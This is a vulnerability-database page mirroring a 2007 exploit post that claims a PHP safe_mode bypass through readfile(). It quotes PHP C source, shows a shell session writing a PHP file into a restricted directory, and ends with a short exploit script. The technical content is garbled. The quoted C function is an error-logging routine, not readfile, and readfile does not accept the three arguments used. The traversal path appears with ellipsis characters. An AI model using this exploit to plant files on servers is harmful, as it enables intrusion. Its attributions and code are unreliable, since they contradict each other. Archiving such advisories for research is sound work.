Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16511
HistoryMar 29, 2007 - 12:00 a.m.

readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4

2007-03-2900:00:00
vulners.com
172
JSON

SecurityRisk : DEN
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : The-WolF-kSA
Date : 24.3.2007

Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4

[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]

Author: ThE-WoLf-KsA)
Date:

  • -Written: 24.3.2007

  • — 0.Description —

  • — 1. readfile() Safe Mode Bypass —
    readfile() function read throu, file or display your file or path. You can
    read into
    files. Issue is very simple. readfile() check safe_mode and
    open_basedir in stream function. But isn't allowed use URL. And
    problem exists in incorrect filename.

PHP5:

  • -2013-2050—
    PHPAPI int _php_readfile(int opt_err, char *message, char *opt,
    char *headers TSRMLS_DC)
    {
    php_stream *stream = NULL;

switch (opt_err) {

case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message",
message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option
not available!");
return FAILURE;
#endif
}
break;

case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP
option not available!");
return FAILURE;
break;

case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a",
IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;

default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
}

  • -2013-2050—

Let's see to option 3.

  • -2038 line—
    stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |
    ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
  • -2038 line—

Option "a", writte to file error or if file dosen't
exists, create new file.
Problem is because in php_stream_open_wrapper(), is defined
"IGNORE_URL".
IGNORE_URL turn off safe_mode if you use
"prefix://…/…/".

  • -Example—
    cxib# php -r 'readfile("<? echo \"cx\";
    ?>", 3, "/www/temp/sr.php");'

Warning: readfile(): SAFE MODE Restriction in effect. The
script whose uid is 0 is not allowed to access /www/temp owned by
uid 80 in Command line code on line 1

Warning: readfile(/www/temp/sr.php): failed to open stream:
Invalid argument in Command line code on line 1
cxib# php -r 'readfile("<? echo \"cx\";
?>", 3, "php://…/…/www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php

  • -rw-r–r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
    cxib#

  • -Example—

  • — 2. Exploit —
    <?php
    $file=""; # FILENAME
    readfile("<? echo \"cx\"; ?>", 3,
    "php://…/…/".$file);
    ?>

  • — 4. Greets —
    SniPer_hex

  • — 5. Contact —
    [email protected]

milw0rm.com [2007-03-25]

JSON